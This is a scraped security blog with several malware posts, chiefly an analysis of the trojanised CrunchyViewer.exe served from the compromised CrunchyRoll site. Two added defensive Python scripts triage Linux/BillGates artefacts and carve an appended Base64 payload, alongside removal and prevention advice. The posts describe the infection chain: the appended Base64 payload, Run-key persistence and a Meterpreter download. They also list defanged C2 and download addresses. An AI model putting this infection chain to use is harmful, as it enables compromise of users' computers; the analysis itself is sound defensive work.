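<br /></div>
<div>
The identification steps above (the indicator paths, the PIDs in the .lod and .lock files, the rcX.d start links, the DDoS module names and the replaced monitoring tools) can be scripted. The following Python triage script is an added example, not part of the original post and not BillGates' own code: it is pointed at a root directory, which can be the real / of a suspect host or a staging copy, and reports what it finds, leaving the kill and restore steps to you. The fixture built by <b>demo()</b> is constructed, not a real infection, and the dpkgd comparison assumes the backups there are the untouched originals, as described above.</div>

```python
"""Triage helper for the Linux/BillGates artefacts listed above.

Added example, not code from the original post. Point it at a root directory
(the real "/" on a suspect host, or a staging copy) and it reports what it
finds; killing and restoring remain the operator's call.
"""
import hashlib
import os
import re
import tempfile

# Fixed-name indicators from the table (randomly named files still need find).
ARTEFACT_PATHS = [
    "etc/cmd.n", "etc/conf.n", "etc/init.d/DbSecuritySpt", "etc/init.d/selinux",
    "tmp/.bash_root.tmp3", "tmp/.bash_root.tmp3h", "tmp/notify.file",
    "usr/bin/bsd-port/.sshd", "usr/bin/bsd-port/getty", "usr/lib/libamplify.so",
]
PID_FILES = ["tmp/bill.lod", "tmp/gates.lod", "tmp/gates.lock",
             "tmp/moni.lod", "tmp/moni.lock"]
DDOS_MODULES = {"atddd", "cupsdd", "cupsddh", "ksapdd", "kysapdd", "sksapdd", "skysapdd"}
HIJACKED_TOOLS = ["lsof", "netstat", "ps", "ss"]
HIJACKED_DIRS = ["bin", "usr/bin", "usr/sbin"]
BACKUP_DIR = "usr/bin/dpkgd"


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def read_pid(path):
    # bill/gates/moni .lod and .lock files hold a decimal PID
    with open(path, "r", errors="replace") as f:
        m = re.search(r"\d+", f.read())
    return int(m.group()) if m else None


def triage(root="/"):
    root = os.path.abspath(root)
    found = {"artefacts": [], "pids": {}, "rc_links": [], "modules": [], "hijacked": []}
    for rel in ARTEFACT_PATHS:
        if os.path.lexists(os.path.join(root, rel)):
            found["artefacts"].append("/" + rel)
    for rel in PID_FILES:
        path = os.path.join(root, rel)
        if os.path.isfile(path):
            found["pids"]["/" + rel] = read_pid(path)
    # /etc/rcX.d/*DbSecuritySpt for any runlevel X
    etc = os.path.join(root, "etc")
    for d in (os.listdir(etc) if os.path.isdir(etc) else []):
        if re.fullmatch(r"rc\d\.d", d) and os.path.isdir(os.path.join(etc, d)):
            for name in os.listdir(os.path.join(etc, d)):
                if "DbSecuritySpt" in name:
                    found["rc_links"].append("/etc/%s/%s" % (d, name))
    # DDoS modules: usually in /etc/, but match the names anywhere under root
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name in DDOS_MODULES:
                found["modules"].append("/" + os.path.relpath(os.path.join(dirpath, name), root))
    # A backup in dpkgd/ that differs from the live tool means the live one was replaced
    for tool in HIJACKED_TOOLS:
        backup = os.path.join(root, BACKUP_DIR, tool)
        if not os.path.isfile(backup):
            continue
        for d in HIJACKED_DIRS:
            live = os.path.join(root, d, tool)
            if os.path.isfile(live) and sha256_of(live) != sha256_of(backup):
                found["hijacked"].append(("/%s/%s" % (d, tool), "/%s/%s" % (BACKUP_DIR, tool)))
    for key in ("artefacts", "rc_links", "modules", "hijacked"):
        found[key].sort()   # deterministic output regardless of os.walk order
    return found


def demo():
    """Constructed fixture, not a real infection: a staging root laid out as the table describes."""
    root = tempfile.mkdtemp(prefix="billgates-")
    layout = {
        "etc/init.d/DbSecuritySpt": b"#!/bin/sh\n",
        "etc/rc3.d/97DbSecuritySpt": b"#!/bin/sh\n",
        "etc/cupsdd": b"\x7fELF-not-really",
        "tmp/gates.lod": b"4242\n",
        "tmp/moni.lod": b"4243\n",
        "usr/bin/dpkgd/ps": b"original ps",
        "bin/ps": b"trojaned ps",
        "usr/bin/dpkgd/netstat": b"original netstat",
        "bin/netstat": b"original netstat",  # untouched: identical to its backup
    }
    for rel, data in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return triage(root)


if __name__ == "__main__":
    print(demo())
```

<div>
Run it as root on the suspect host with <b>triage("/")</b>; <b>demo()</b> builds a throwaway staging root first. A tool is only flagged as replaced when a backup with the same name exists in /usr/bin/dpkgd/ and differs from the live binary, so on a host where the backups are missing you need the package-manager verification from the removal section instead.</div>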
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b></div>
<div>
<b><span style="font-size: large;"><br /></span></b></div>
<div>
While Linux/BillGates may no longer be the biggest player on the market, or even as popular or common as it once was, the threat still exists, just like Xor.DDoS.</div>
<div>
<br /></div>
<div>
Practice proper security hygiene and take appropriate <a href="https://bartblaze.blogspot.co.uk/2015/09/notes-on-linuxxorddos.html#Prevention" target="_blank">preventative measures</a>.</div>
<div>
<br /></div>
<div>
In the resources section below, you may find additional useful links.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><u>Resources</u></b></div>
<div>
<b><u><br /></u></b></div>
<div>
Blaze's Security Blog - <a href="https://bartblaze.blogspot.co.uk/2015/09/notes-on-linuxxorddos.html" target="_blank">Notes on Linux/Xor.DDoS</a><br />
HabraHabr - <a href="https://habrahabr.ru/post/213973/" target="_blank">Let's explore Linux Botnet "BillGates"</a></div>
<div>
Linux.com - <a href="https://www.linux.com/learn/how-move-files-using-linux-commands-or-file-managers" target="_blank">How to Move Files Using Linux Commands or File Managers</a><br />
LiquidWeb - <a href="https://www.liquidweb.com/kb/how-to-display-list-all-jobs-in-cron-crontab/" target="_blank">How to Display (List) All Jobs in Cron / Crontab</a><br />
MakeUseOf - <a href="http://www.makeuseof.com/tag/free-linux-antivirus-programs/" target="_blank">The 7 Best Free Linux Anti-Virus Programs</a><br />
MalwareMustDie - <a href="http://blog.malwaremustdie.org/2015/08/mmd-0039-2015-chinaz-made-new-malware.html" target="_blank">ChinaZ made new malware: ELF Linux/BillGates.Lite</a><br />
Netlab 360 - <a href="http://blog.netlab.360.com/new-elknot-billgates-variant-with-xor-like-c2-configuration-encryption-scheme/" target="_blank">New Elknot/Billgates Variant with XOR like C2 Configuration Encryption Scheme</a></div>
<div>
nixCraft - <a href="https://www.cyberciti.biz/faq/kill-process-in-linux-or-terminate-a-process-in-unix-or-linux-systems/" target="_blank">Kill Process in Linux or Terminate a Process in UNIX / Linux Systems</a></div>
<div>
QueQuero - <a href="https://quequero.org/2015/01/ssh-kippo-honeypot-4-months-operation-summary/" target="_blank">Inside a Kippo honeypot: how the billgates botnet spreads</a><br />
ThisIsSecurity - <a href="https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/" target="_blank">When ELF.BillGates met Windows</a><br />
ValdikSS (Github) - <a href="https://github.com/ValdikSS/billgates-botnet-tracker" target="_blank">BillGates botnet tracker</a></div>
</div>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-41181485032483935842017-11-04T16:02:00.000+01:002018-01-08T14:40:42.361+01:00CrunchyRoll hack delivers malware<br />
<b><span style="font-size: large;">Introduction</span></b><br />
<br />
There's a Reddit post today with a PSA (Public Service Announcement) about Crunchyroll, a website that offers anime streaming, being hacked:<br />
<br />
<a href="https://www.reddit.com/r/anime/comments/7aq2s7/psa_dont_enter_crunchyrollcom_at_the_moment_it/" target="_blank">PSA : Don't enter crunchyroll.com at the moment, it seems they've been hacked.</a><br />
<br />
As mentioned before, Crunchyroll offers anime streaming, and in their own words:<br />
<blockquote class="tr_bq">
<i>Enjoy your favorite anime & manga at the speed of Japan</i></blockquote>
<br />
The German Crunchyroll team has additionally issued the following warning:<br />
<br />
<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
And for our English-speaking audience<br />
Please DO NOT access our website at the current time. We are aware of the issues and are working on it</div>
— Crunchyroll.de (@Crunchyroll_de) <a href="https://twitter.com/Crunchyroll_de/status/926782599460212736?ref_src=twsrc%5Etfw">November 4, 2017</a></blockquote>
<br />
The official CrunchyRoll Twitter account has tweeted the following:<br />
<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
ATTENTION ALL CRUNCHYROLL USERS!!<br />
<br />
Please DO NOT access our website at the current time. We are aware of the issues and are working on it!!</div>
— Crunchyroll (@Crunchyroll) <a href="https://twitter.com/Crunchyroll/status/926813560306417664?ref_src=twsrc%5Etfw">November 4, 2017</a></blockquote>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<br />
<br />
If you are only interested in how to remove this malware, scroll down to the disinfection/removal section, or click <a href="https://bartblaze.blogspot.com/2017/11/crunchyroll-hack-delivers-malware.html#disinfection">here</a>.<br />
<br />
<br />
<b><span style="color: orange;">Update</span></b>: CrunchyRoll has announced, after a few hours, that the issue is resolved:<br />
<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
We've just gotten the all-clear to say that <a href="https://t.co/x1dBCM9X9C">https://t.co/x1dBCM9X9C</a> is back online!! Thank you SO MUCH for your patience ~ ❤️ <a href="https://t.co/FQRRHowvp6">pic.twitter.com/FQRRHowvp6</a></div>
— Crunchyroll (@Crunchyroll) <a href="https://twitter.com/Crunchyroll/status/926849277430718464?ref_src=twsrc%5Etfw">November 4, 2017</a></blockquote>
<br />
<br />
However, I still advise you to scroll over to the <a href="https://bartblaze.blogspot.com/2017/11/crunchyroll-hack-delivers-malware.html#disinfection">disinfection or removal</a> section. Any questions, feel free to leave a comment, or contact me on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>.<br />
<br />
<br />
<br />
<span style="font-size: large;"><b>Analysis</b></span><br />
<br />
So, what happens when you visit the CrunchyRoll website? Currently, you get a message that the website has encountered an error:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-mKo6AOY-qbI/Wf3OfbN4J8I/AAAAAAAAB5s/NTC_gmZonLEkoIomiYjtMZdKVBrdD35mQCLcBGAs/s1600/cr.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="719" data-original-width="919" height="312" src="https://3.bp.blogspot.com/-mKo6AOY-qbI/Wf3OfbN4J8I/AAAAAAAAB5s/NTC_gmZonLEkoIomiYjtMZdKVBrdD35mQCLcBGAs/s400/cr.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - CrunchyRoll error page</td></tr>
</tbody></table>
<br />
Earlier today, the CrunchyRoll website was showing the following:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-bf2WeaAAoxw/Wf3PUC5KjKI/AAAAAAAAB6E/lH4TuK9zK_EFLoCFzAtcQwbrDpqeNV5QACLcBGAs/s1600/cr-db.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="524" data-original-width="1064" height="196" src="https://3.bp.blogspot.com/-bf2WeaAAoxw/Wf3PUC5KjKI/AAAAAAAAB6E/lH4TuK9zK_EFLoCFzAtcQwbrDpqeNV5QACLcBGAs/s400/cr-db.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Likely hacked CrunchyRoll website (<a href="https://www.reddit.com/r/anime/comments/7aq2s7/psa_dont_enter_crunchyrollcom_at_the_moment_it/" target="_blank">Image source</a>)</td></tr>
</tbody></table>
<br />
<br />
While the CrunchyRoll team claims it was a DNS hijack, I have (so far) found no evidence supporting that claim; it rather appears someone was able to hack the website itself.<br />
<br />
Either way, while this is bad, CrunchyRoll took swift action by taking down the website, and an investigation is under way.<br />
<br />
What happens if you click the 'Download now' button? A new file, called <i>CrunchyViewer.exe</i>, will be downloaded from the following IP address:<br />
<br />
<blockquote class="tr_bq">
109.232.225[.]12</blockquote>
<br />
This IP appears to have hosted fake antivirus software or similar in the past:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-xR-dMa_bgfE/Wf3QfTIWaAI/AAAAAAAAB6Q/_HaXRhOMozsvq87BDXGZ0X1iYlU3mEtUgCLcBGAs/s1600/cr-pt.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="637" data-original-width="997" height="255" src="https://1.bp.blogspot.com/-xR-dMa_bgfE/Wf3QfTIWaAI/AAAAAAAAB6Q/_HaXRhOMozsvq87BDXGZ0X1iYlU3mEtUgCLcBGAs/s400/cr-pt.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Older resolutions (2010)</td></tr>
</tbody></table>
<br />
The newly downloaded file is <i>seemingly</i> the legitimate CrunchyViewer or Crunchyroll application, but near the end of the file there is a chunk of Base64-encoded data appended, as seen in Figure 4:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-Pj7YaAnaYyw/Wf3OfkWxmJI/AAAAAAAAB58/-cGu31hT3EoFI0ZYUfXC2epZoBAXGtpVwCEwYBhgL/s1600/cr4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="373" data-original-width="1187" height="125" src="https://1.bp.blogspot.com/-Pj7YaAnaYyw/Wf3OfkWxmJI/AAAAAAAAB58/-cGu31hT3EoFI0ZYUfXC2epZoBAXGtpVwCEwYBhgL/s400/cr4.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - base64 encoded data (click to enlarge)</td></tr>
</tbody></table>
<br />
Using a <a href="https://opinionatedgeek.com/Codecs/Base64Decoder" target="_blank">Base64 decoder</a>, we get a new file, called svchost.exe. This binary places a copy of itself in the current user's roaming application data folder (<i>%APPDATA%</i>), for example:<br />
<br />
<i>C:\Users\<b>Yourusername</b>\AppData\Roaming\<b>svchost.exe</b></i><br />
<br />
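<div>
The appended blob can be carved automatically instead of with an online decoder. The following Python script is an added example, not part of the original post and not the malware's own code: it reads the PE section table to find where the legitimate image ends, treats the bytes after that point as the overlay, decodes the Base64 run found there and checks whether the result is itself a PE file. The two tiny PE images built by <b>demo()</b> are constructed stand-ins for CrunchyViewer.exe and svchost.exe, not the real samples, the <b>min_len</b> threshold is a heuristic of mine, and the script makes no assumption about how the loader itself decodes the blob, which this post does not describe.</div>

```python
"""Carve a Base64-encoded payload appended to a PE file.

Added example, not code from the original post. The PE image ends where the
last section's raw data ends; anything after that is the overlay, which in the
CrunchyViewer.exe case holds the Base64 text of the dropped svchost.exe.
"""
import base64
import hashlib
import re
import struct


def pe_end_offset(data):
    """Offset just past the last section's raw data, i.e. where the overlay starts."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    nsections, = struct.unpack_from("<H", data, e_lfanew + 6)    # COFF NumberOfSections
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)    # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                             # first section header
    end = table + 40 * nsections                                 # at least past the headers
    for i in range(nsections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def pe_signature_ok(data):
    try:
        pe_end_offset(data)
        return True
    except (ValueError, struct.error):
        return False


def carve_overlay_base64(data, min_len=64):
    """Return details of a Base64 blob in the overlay, or None if there is none.
    min_len (a heuristic) skips short Base64-looking strings such as version data."""
    start = pe_end_offset(data)
    overlay = re.sub(rb"\s+", b"", data[start:])               # tolerate line breaks
    m = re.search(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, overlay)
    if not m:
        return None
    blob = m.group() + b"=" * (-len(m.group()) % 4)              # restore padding
    payload = base64.b64decode(blob, validate=True)
    return {"overlay_offset": start, "payload": payload, "payload_size": len(payload),
            "is_pe": pe_signature_ok(payload),
            "sha256": hashlib.sha256(payload).hexdigest()}


def build_fake_pe(section_data):
    """Constructed minimal PE: DOS header, PE signature, COFF header with one
    section and no optional header, one section header, then the raw data."""
    dos = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    raw_ptr = 0x80                                               # headers end exactly here
    section = struct.pack("<8sIIIIIIHHI", b".text\0\0\0", len(section_data), 0x1000,
                          len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + b"PE\0\0" + coff + section
    assert len(headers) == raw_ptr
    return headers + bytes(section_data)


def demo():
    """Constructed sample: a host PE with a Base64-encoded second PE appended."""
    host = build_fake_pe(b"\x90" * 32)
    dropped = build_fake_pe(b"\xCC" * 16)
    sample = host + b"\r\n" + base64.b64encode(dropped) + b"\r\n"
    result = carve_overlay_base64(sample)
    result["expected_payload"] = dropped
    return result


if __name__ == "__main__":
    r = demo()
    print("overlay at", r["overlay_offset"], "payload", r["payload_size"], "bytes,",
          "PE" if r["is_pe"] else "not PE", r["sha256"])
```

<div>
On a real sample, read the file into <b>data</b> and call <b>carve_overlay_base64(data)</b>; the returned SHA-256 is the hash of the dropped binary and can be matched against the IOCs at the end of this post. A clean file with no overlay returns None.</div>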
This file will periodically call to its C2, or command-and-control server, and wait for any commands:<br />
<br />
<blockquote class="tr_bq">
145.239.41[.]131</blockquote>
<br />
Currently, the C2 does not appear to respond on that specific port (6969); the host itself is online, however.<br />
<br />
There are claims the malware will additionally install ransomware - I have not observed this behaviour, but it is definitely possible once the C2 sends back (any) commands. <strike>More likely, it is a form of keylogger - malware that can record anything you type, and send it back to the attacker.</strike><br />
<strike><br /></strike>
<b><span style="color: orange;">Update</span></b>: It appears however, thanks to <a href="https://twitter.com/anyrun_app" target="_blank">ANY.RUN</a> for the heads-up, (analysis <a href="https://app.any.run/tasks/010df394-dad9-41dd-87ef-f80892cde074" target="_blank">here</a>) that the malware actually downloads Meterpreter, which is a default Metasploit payload.<br />
<br />
More information about Meterpreter can be found <a href="https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter" target="_blank">here</a>, but basically, it can be viewed as a backdoor, as it allows the attacker to completely control your machine. However, it does appear the C2 server only downloaded Meterpreter for a limited amount of time - as port 6969 only responded within a specific time-frame.<br />
<br />
Note that the disinfection or removal tips are still applicable in this case.<br />
<br />
<i>Svchost.exe</i> will also create an autorun entry:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-Yw2QdTwh3VY/Wf3SjJ71lXI/AAAAAAAAB6c/jbkEx4tdeCAIXXbKOAvwY7M7xsc1w_ioQCLcBGAs/s1600/cr5.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="238" data-original-width="750" height="126" src="https://1.bp.blogspot.com/-Yw2QdTwh3VY/Wf3SjJ71lXI/AAAAAAAAB6c/jbkEx4tdeCAIXXbKOAvwY7M7xsc1w_ioQCLcBGAs/s400/cr5.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - newly created run key <span style="font-size: 12.8px;">(click to enlarge)</span></td></tr>
</tbody></table>
<br />
This basically means the malware will start every time you (re)boot or restart the machine.<br />
<br />
Just for fun: the miscreant, or whoever compiled the malware, appears to be named Ben, judging from the PDB debug paths:<br />
<br />
<blockquote class="tr_bq">
<i>C:\Users\<b>Ben</b>\Desktop\taiga-develop\bin\Debug\Taiga.pdb</i> </blockquote>
<blockquote class="tr_bq">
<i>c:\users\<b>ben</b>\source\repos\svchost\Release\svchost.pdb</i></blockquote>
<br />
<a href="https://github.com/erengy/taiga" target="_blank">Taiga</a> is 'A lightweight anime tracker for Windows'. This does <b>not </b>mean they are involved, but rather that 'Ben' has decided to include Taiga in the package.<br />
<br />
<b><span style="color: orange;">Update</span></b>: the developer of Taiga has included a fix for 'CrunchyViewer':<br />
<a href="https://github.com/erengy/taiga/issues/489">https://github.com/erengy/taiga/issues/489</a><br />
<br />
Thus, if you now update or install the official Taiga application, it will prompt you if the malware is found, and is able to remove it.<br />
<br />
<br />
<b><span id="disinfection" span="" style="font-size: large;">Disinfection/Removal</span></b><br />
<br />
Disinfection is rather straightforward:<br />
<br />
<br />
<ul>
<li>Remove the malicious "Java" Run entry, by opening <b>Regedit</b>, and browsing to:<br /><i>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</i></li>
<li>Delete the '<b>Java</b>' value (an entry under Run, not a subkey);</li>
</ul>
<ul>
<li><b>Reboot</b> your machine;</li>
</ul>
<ul>
<li>Remove the malicious binary, by navigating to:<br /><b>%appdata%</b> (which expands to, for example, <i>C:\Users\<b>Yourusername</b>\AppData\Roaming\</i>)</li>
<li>Delete the 'svchost.exe' file.</li>
</ul>
<div>
<ul>
<li>Perform a scan with your installed antivirus product;</li>
<li>Perform a scan with an online antivirus, which is different from the one you have. Alternatively, perform a scan with <a href="https://www.malwarebytes.com/" target="_blank">Malwarebytes</a>.</li>
<li>Change all your passwords if possible. Better be safe than sorry.</li>
</ul>
</div>
<br />
<br />
<br />
<b><span style="font-size: large;">Prevention</span></b><br />
<br />
<br />
Prevention advice in general, which also applies to CrunchyRoll's compromise:<br />
<br />
<ul>
<li>Install an antivirus;</li>
<li>Keep your browser up-to-date;</li>
<li>Install <a href="https://noscript.net/" target="_blank">NoScript</a> if you have Firefox;</li>
<li>Install a 'well-rounded' ad-blocker, for example <a href="https://github.com/gorhill/uBlock#installation" target="_blank">uBlock Origin</a> (works with most browsers);</li>
<li>If a website you visit frequently suddenly looks completely different, or urges you to download whatever, be safe rather than sorry, and leave the website.</li>
<li>Additionally, try to Google or use social media to verify if anyone else is experiencing the same issue.</li>
</ul>
<div>
In this particular case or incident, you may also want to block the two IP addresses as described in this blog post, by adding them in your firewall.</div>
<br />
<br />
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
This hack shows that any website or organisation is, in theory, vulnerable to someone hijacking the website and consequently downloading and installing malware on its users' machines.<br />
<br />
While it is uncertain what exactly happened, CrunchyRoll took correct action by taking the website down not too long after. At this point, it is best to monitor their Twitter account, and/or wait for an official statement.<br />
<br />
If you have not executed the file, you should be safe. Simply delete the downloaded file.<br />
<i><br /></i>
<strike><i>Note </i>that I can't speak for any second-stage payload that may have been downloaded in the early stage of the attack - however; when I investigated shortly after, I didn't observe any secondary malware.</strike><br />
<br />
<b><span style="color: orange;">Update</span></b>: the second-stage payload was the default Meterpreter by Metasploit. Updated analysis above. This does not affect or change the disinfection or removal steps.<br />
<br />
Follow the prevention tips above to stay secure. Any questions or feedback? Feel free to leave a <a href="https://bartblaze.blogspot.co.uk/2017/11/crunchyroll-hack-delivers-malware.html#comments">comment</a>, or reach out to me on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>.<br />
<br />
<br />
<br />
<b>IOCs</b><br />
<b><br /></b>
<script src="https://otx.alienvault.com/pulse/59fdd95069fa71758e3cd6f7.js"></script>
<b><br /></b>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com18tag:blogger.com,1999:blog-606282676955748155.post-21552850763106964412017-10-25T21:06:00.001+02:002017-11-01T10:35:10.580+01:00Comparing EternalPetya and BadRabbit<br />
I've created a table comparing the EternalPetya (ExPetr, NotPetya, etc.) outbreak from June, and the BadRabbit ransomware outbreak from yesterday (2017-10-24).<br />
<br />
I have decided to not include <a href="https://bartblaze.blogspot.co.uk/2017/05/wannacry-frequently-asked-questions.html" target="_blank">WannaCry</a> (WanaCrypt0r), as they are not related, while EternalPetya and BadRabbit do seem very closely related, or even developed by (a part of) the same people.<br />
<br />
Use freely, as long as you include a link to the original <a href="https://bartblaze.blogspot.com/2017/10/comparing-eternalpetya-and-badrabbit.html">source</a>, which is this blog post.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir87fqildvAn0IqVRHz6YcleSva3zpyVYHQjbw-TwD6JyysKra3bqKzVIxrdI9ZKtPMfnRTTiQiaqBWa5X3MJ4kkM8RIyyuj_cVdYrzSYEt3lbDRvouy7YAhzal7eFtivpwpXK7t_QwwHc/s1600/EP-BR-comparison.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="782" data-original-width="593" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir87fqildvAn0IqVRHz6YcleSva3zpyVYHQjbw-TwD6JyysKra3bqKzVIxrdI9ZKtPMfnRTTiQiaqBWa5X3MJ4kkM8RIyyuj_cVdYrzSYEt3lbDRvouy7YAhzal7eFtivpwpXK7t_QwwHc/s640/EP-BR-comparison.PNG" width="484" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Comparison table (click to enlarge)</td></tr>
</tbody></table>
<br />
<br />
<b><span style="font-size: large;">Download the table / comparison sheet</span></b><br />
<br />
Additionally, the same comparison is available as a handy spreadsheet (which you can also download in several formats) on Google Docs here:<br />
<a href="https://docs.google.com/spreadsheets/d/1RQvl8Yl08Xz1DBbA4D-wNcS7qZQvnU4VYqP7OI4s_qE" target="_blank">EternalPetya_BadRabbit_Comparison</a><br />
<br />
<i>Note</i>: this table or sheet will be updated continuously.<br />
<br />
<br />
<b><span style="font-size: large;">Purpose of BadRabbit?</span></b><br />
<br />
Again, this makes you wonder about the actual purpose of ransomware, which you can read more about here: <a href="https://bartblaze.blogspot.com/p/the-purpose-of-ransomware.html" target="_blank">The purpose of ransomware</a><br />
<br />
For BadRabbit in particular, it may be deployed as a cover-up or smokescreen, or for both disruption <i>and </i>extortion.<br />
<br />
<br />
<b><span style="font-size: large;">Prevention</span></b><br />
<br />
For prevention advice, have a look at the following page I've set up:<br />
<a href="https://bartblaze.blogspot.com/p/ransomware-prevention.html" target="_blank">Ransomware prevention</a><br />
<br />
<br />
<b><span style="font-size: large;">Disinfection and decryption</span></b><br />
<br />
Unfortunately, decryption is likely not possible without the cybercriminal's private key.<br />
<br />
You <i>may</i> be able to restore the MBR, or your files, if you catch the ransomware in the act and shut down the machine at that point. <a href="https://www.howtogeek.com/107511/how-to-boot-into-safe-mode-on-windows-8-the-easy-way/" target="_blank">Reboot in safe mode</a> and copy over or <a href="https://www.howtogeek.com/242428/whats-the-best-way-to-back-up-my-computer/" target="_blank">back up</a> your files.<br />
<br />
Then, <a href="https://www.howtogeek.com/howto/32523/how-to-manually-repair-windows-7-boot-loader-problems/" target="_blank">restore the MBR</a>, and <a href="https://www.howtogeek.com/133254/beginner-geek-how-to-reinstall-windows-on-your-computer/" target="_blank">reinstall Windows</a>.<br />
<br />
You may also try to restore the MBR <i>first</i>, and subsequently attempt to restore files from Shadow Volume Copies. For example, a tool such as <a href="http://www.shadowexplorer.com/" target="_blank">Shadow Explorer</a> can be of assistance, or read the tutorial <a href="https://www.bleepingcomputer.com/tutorials/how-to-recover-files-and-folders-using-shadow-volume-copies/" target="_blank">here</a>.<br />
<br />
If that doesn't work either, you may try a data recovery program such as <a href="http://www.cgsecurity.org/wiki/PhotoRec" target="_blank">PhotoRec</a> or <a href="https://www.piriform.com/recuva" target="_blank">Recuva</a>.<br />
<br />
<br />
Any questions, comments or feedback, please do let me know in the comments section below, or send me a message on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>. See also my <a href="https://bartblaze.blogspot.co.uk/p/about.html" target="_blank">About me</a> page for other contact details.<br />
<br />
<br />
<br />Posted by Bart<br />
<br />
<b><span style="font-size: large;">Notes on Sage 2.2 ransomware version</span></b> (2017-10-14, updated 2017-10-21)<br />
Sage, also known as SageCrypt, is an interesting ransomware family that emerged somewhere in December last year, and is believed to be a variant of the CryLocker ransomware.<br />
<br />
There's a good <a href="https://www.bleepingcomputer.com/news/security/sage-2-0-ransomware-gearing-up-for-possible-greater-distribution/" target="_blank">blog post</a> on BleepingComputer on the first version of Sage, i.e. "Sage 2".<br />
<br />
Yesterday, a personal friend of mine reached out, as his "computer started talking" and his files appeared to be encrypted. And indeed, it appears he suffered the latest variant of Sage: Sage 2.2.<br />
<br />
Sage 2.2 appears to have been out for a while, at least since February of this year:<br />
<br />
<blockquote class="twitter-tweet" data-cards="hidden" data-lang="en">
<div dir="ltr" lang="en">
Sage 2.2 sample (at 11/58): <a href="https://t.co/XsWMsPcXsj">https://t.co/XsWMsPcXsj</a><br />
From: nrcommerce[.]com/system/config/spam1.exe - that filename... 👏<br />
More samples: <a href="https://t.co/a2J157kjJk">pic.twitter.com/a2J157kjJk</a></div>
— MalwareHunterTeam (@malwrhunterteam) <a href="https://twitter.com/malwrhunterteam/status/834028153299410944?ref_src=twsrc%5Etfw">February 21, 2017</a></blockquote>
<br />
Some figures of Sage 2.2 follow below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
